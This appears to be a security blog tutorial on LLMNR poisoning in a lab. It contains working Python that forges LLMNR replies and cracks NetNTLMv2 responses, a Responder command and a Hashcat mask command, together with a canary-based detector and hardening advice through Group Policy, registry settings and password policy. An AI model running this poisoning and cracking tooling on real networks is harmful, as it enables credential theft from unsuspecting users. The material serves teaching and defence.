Understanding how attackers exploit protocols is crucial for defending your infrastructure. Link-Local Multicast Name Resolution (LLMNR) is an often overlooked but easily abused protocol. Windows falls back to LLMNR when DNS cannot resolve a hostname: the client multicasts the query to every host on the local subnet (224.0.0.252, UDP port 5355) and trusts whatever answers, with no authentication at all. It is a last-ditch effort to resolve the name, and that is exactly what makes it a powerful attack vector for anyone who can see and answer traffic on the same network segment.
The attack is straightforward: an intruder (or insider) listens for LLMNR queries on the network. Most of these queries happen in the morning as systems boot, or whenever someone mistypes a server name. The attacker answers the query with their own IP address, the victim's machine connects to the attacker and authenticates with NTLM, and the attacker captures the victim's NTLMv2 challenge and response for offline cracking.
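To make the exchange concrete, here is a small Python example added for this article (it is not part of Responder or of the original post). It builds the multicast query a Windows host sends for a name DNS could not resolve, builds the poisoned reply an attacker returns, parses both, and reuses the parser as a simple detector: query a canary name that nobody legitimately owns, and any host that answers it is a poisoner. The attacker address 192.168.77.50, the transaction IDs and the canary name are constructed for the demo.

```python
import ipaddress
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355
FLAG_QR = 0x8000              # bit 15 of the flags word: 0 = query, 1 = response


def encode_name(name):
    """Hostname -> DNS wire-format labels (LLMNR reuses the DNS message layout)."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(buf, offset):
    """Read a wire-format name at offset, following compression pointers; returns (name, next_offset)."""
    labels, jumped, end, hops = [], False, offset, 0
    while True:
        length = buf[offset]
        if length & 0xC0 == 0xC0:                   # pointer to an earlier copy of the name
            hops += 1
            if hops > 8:                            # refuse pointer loops in hostile packets
                raise ValueError("compression pointer loop")
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", buf[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def build_query(txid, name, qtype=1):
    """The multicast query a Windows host sends when DNS has nothing for 'name' (A record by default)."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse(packet):
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(packet, offset)
        qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, offset = decode_name(packet, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", packet[offset:offset + 10])
        offset += 10
        rdata = packet[offset:offset + rdlen]
        offset += rdlen
        value = str(ipaddress.IPv4Address(rdata)) if rtype == 1 and rdlen == 4 else rdata.hex()
        answers.append((name, rtype, ttl, value))
    return {"id": txid, "is_response": bool(flags & FLAG_QR), "questions": questions, "answers": answers}


def build_poisoned_response(query, attacker_ip, ttl=30):
    """What a poisoner sends back: same transaction ID, QR=1, question echoed, one A record pointing at itself."""
    q = parse(query)
    name, qtype, qclass = q["questions"][0]
    header = struct.pack("!HHHHHH", q["id"], FLAG_QR, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, qclass)
    rdata = ipaddress.IPv4Address(attacker_ip).packed
    return header + question + encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata


def find_poisoners(observations, canary_names):
    """Canary detection over (src_ip, udp_payload) pairs as a sniffer would hand them over:
    nobody legitimately owns the canary names, so any host answering for one is a poisoner."""
    suspects, canaries = {}, {n.lower() for n in canary_names}
    for src_ip, payload in observations:
        try:
            msg = parse(payload)
        except (struct.error, IndexError, UnicodeDecodeError, ValueError):
            continue                                # not a well-formed LLMNR message; ignore it
        if not msg["is_response"]:
            continue
        for name, _rtype, _ttl, value in msg["answers"]:
            if name.lower() in canaries:
                suspects.setdefault(src_ip, set()).add((name, value))
    return suspects


def probe_live(name, timeout=2.0):
    """Send one canary query on the real LAN and report whoever answers (needs a network; not used by tests)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(0x1234, name), (LLMNR_GROUP, LLMNR_PORT))
    seen = []
    try:
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            seen.append((src, data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return find_poisoners(seen, {name})


if __name__ == "__main__":
    # Constructed exchange: the victim asks for the mistyped name, the attacker (192.168.77.50, assumed) answers.
    query = build_query(0xBEEF, "nxslabs")
    reply = build_poisoned_response(query, "192.168.77.50")
    print(parse(reply))
    print(find_poisoners([("192.168.77.50", reply)], {"nxslabs"}))
```

Note that nothing in the reply proves who sent it: the transaction ID is the only thing the client checks, and it is visible to every host that received the multicast. That is the whole vulnerability, and it is also why the canary probe works as a detector: a real name server never answers for a name that does not exist.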
I have two virtual machines to perform this attack: a Kali Linux machine as the attacker and a domain-joined Windows 10 machine as the victim. We will use a tool called Responder on the Kali attacker machine to listen for LLMNR requests.
sudo responder -I eth0 -dPv
Responder is now impersonating several servers and ready to respond to requests. On the victim machine, I’m logged in as Judith Villa at the IP address of 192.168.77.11. Judith works in HR and would like to access a shared folder on the network located at \\naxslabs\hr.
Judith unfortunately types \\nxslabs\hr instead of \\naxslabs\hr. DNS has no record for nxslabs, so her machine falls back to LLMNR, Responder answers, and the SMB connection lands on the attacker's machine. She is still prompted for her username and password, types them in, and is prompted again and again. She finally gives up and storms off to tell the IT team that they need to get their act together. In the background, the attacker has captured Judith's NTLMv2 challenge and response and can take as much time as needed to crack it offline.
Offline password cracking can take a long time without significant GPU processing power, but perhaps the attacker has done some reconnaissance and has an idea of the company password policy. Maybe it requires nine characters in total with some kind of special character. A season followed by the year is a good starting point for a cracking mask.
We can copy the NTLMv2 response to a file and try a few ideas with Hashcat. Mode 5600 is NetNTLMv2, and -a 3 is a mask attack: ?u is one uppercase letter, ?l one lowercase letter, and the rest of the mask is taken literally.
hashcat -m 5600 -a 3 hash.txt ?u?l?l?l2025!
It didn’t take Hashcat very long to crack the password. Judith doesn’t have administrative privileges, but you can see how devastating this would be if it were a domain administrator account. Note that a captured NTLMv2 response is not a password hash: it cannot be passed to another server the way an NT hash can. What an attacker can do instead is relay the authentication in real time to another server that does not require SMB signing (NTLM relay), gaining access as Judith without cracking anything at all.
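What Hashcat does in mode 5600, shown as a Python example added for this article (it is neither the original post's code nor Hashcat's): it reproduces the NTLMv2 computation from MS-NLMP (NT hash = MD4 of the UTF-16LE password; NTOWFv2 = HMAC-MD5 keyed with the NT hash over the uppercased user name and the domain; NTProofStr = HMAC-MD5 keyed with NTOWFv2 over the server challenge and the client blob), builds a capture line in the user::domain:challenge:proof:blob format that Responder logs, and runs a mask attack with Hashcat's ?u ?l ?d ?s placeholders against it. The user name jvilla, the timestamp, the client challenge and the AV pairs are constructed for the demo; the server challenge 1122334455667788 is Responder's default from Responder.conf. MD4 is implemented inline because OpenSSL 3 builds of Python often refuse hashlib.new("md4").

```python
import hashlib
import hmac
import itertools
import string
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


# MD4 per RFC 1320: (round function, additive constant, message-word order, shift schedule)
_MD4_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data):
    """Pure-Python MD4 (the NT hash is MD4 over the UTF-16LE password)."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in _MD4_ROUNDS:
            for i, j in enumerate(order):
                a = _rotl((a + f(b, c, d) + x[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the next register
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password):
    return md4(password.encode("utf-16le"))


def ntowf_v2(password, user, domain):
    # MS-NLMP 3.3.2: user name is uppercased, domain is used as sent (Hashcat does the same)
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge, blob):
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def av_pairs(nb_domain, nb_computer):
    """Target info the server advertised: AvId 2 = NetBIOS domain, 1 = NetBIOS computer, 0 = end of list."""
    def pair(av_id, value):
        data = value.encode("utf-16le")
        return struct.pack("<HH", av_id, len(data)) + data
    return pair(2, nb_domain) + pair(1, nb_computer) + struct.pack("<HH", 0, 0)


def build_blob(timestamp, client_challenge, target_info):
    """The 'temp' structure: RespType, HiRespType, 6 reserved, FILETIME, client nonce, 4 reserved, AV pairs, 4 reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def hashcat_5600_line(user, domain, server_challenge, proof, blob):
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


_CHARSETS = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
             "d": string.digits, "s": string.punctuation + " "}


def mask_candidates(mask):
    """Expand a Hashcat-style mask (?l ?u ?d ?s, ?? for a literal '?', anything else literal)."""
    pieces, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            pieces.append("?" if mask[i + 1] == "?" else _CHARSETS[mask[i + 1]])
            i += 2
        else:
            pieces.append(mask[i])
            i += 1
    for combo in itertools.product(*pieces):
        yield "".join(combo)


def crack(line, candidates):
    """Recompute NTProofStr for each candidate and compare with the captured one; None if nothing matches."""
    user, _, domain, sc_hex, proof_hex, blob_hex = line.split(":")
    sc, target, blob = bytes.fromhex(sc_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for pw in candidates:
        if nt_proof(pw, user, domain, sc, blob) == target:
            return pw
    return None


def demo_capture(password="Fall2025!"):
    """Constructed capture of user jvilla in domain NAXSLABS, as Responder would log it."""
    server_challenge = bytes.fromhex("1122334455667788")       # Responder's default challenge
    client_challenge = bytes.fromhex("8877665544332211")       # constructed
    blob = build_blob(0x01DC0F5A12345678, client_challenge, av_pairs("NAXSLABS", "NXSLABS"))
    proof = nt_proof(password, "jvilla", "NAXSLABS", server_challenge, blob)
    return hashcat_5600_line("jvilla", "NAXSLABS", server_challenge, proof, blob)


if __name__ == "__main__":
    line = demo_capture()
    print(line)
    print("cracked:", crack(line, mask_candidates("?u?l?l?l2025!")))
```

With the nine-character mask from the article the pure-Python loop walks up to 456,976 candidates, which takes a few minutes here; the same work is a fraction of a second for Hashcat on a GPU. The point is the shape of the search, not the speed: two HMAC-MD5 operations and one MD4 per guess, with the server challenge fixed by the attacker, is about as cheap as a password check gets, so anything a policy guess can express as a mask is gone almost immediately.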
One way of combating LLMNR attacks is to prevent unauthorized access to your network. Configuring 802.1X Network Access Control (NAC) ensures that not just anyone can plug a device into your network and reach resources: anyone wanting access to the network (LAN or WLAN) must authenticate first. It isn't perfect, since a compromised device that is already authorized can still poison the segment it sits on and an insider already has a port, but it is a good start to network security and is likely necessary for regulatory compliance anyway.
Active Directory environments should turn off LLMNR, NetBIOS over TCP/IP, and multicast DNS (mDNS). LLMNR is disabled through Group Policy under Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution (set to Enabled), which writes the registry value EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient. NetBIOS over TCP/IP is disabled per adapter on the WINS tab of the IPv4 properties, or for DHCP clients with the Microsoft vendor option 001 "Disable NetBIOS" set to 2. mDNS is disabled with the registry value EnableMDNS = 0 under HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters. With all three off, the poisoning path is closed on every host that received the settings; verify with a canary query rather than assuming the policy applied. Turning off mDNS may not be feasible for all networks (printers, conferencing gear and Apple devices rely on it), so that will need to be a business decision.
Establish good password policies. NIST SP 800-63B recommends a minimum of 8 characters for user-chosen passwords, allowing long passphrases (at least 64 characters), and screening new passwords against lists of known breached and commonly used values; it advises against mandatory composition rules and periodic forced changes. Length matters more than symbol requirements: a season plus the year plus a symbol satisfies a typical "nine characters with a special character" rule and still falls to a mask attack in seconds, while a long passphrase is easier for users to remember and far more difficult to crack in any reasonable amount of time. See NIST SP 800-63B for password guidance.
© NAXS LABS All Rights Reserved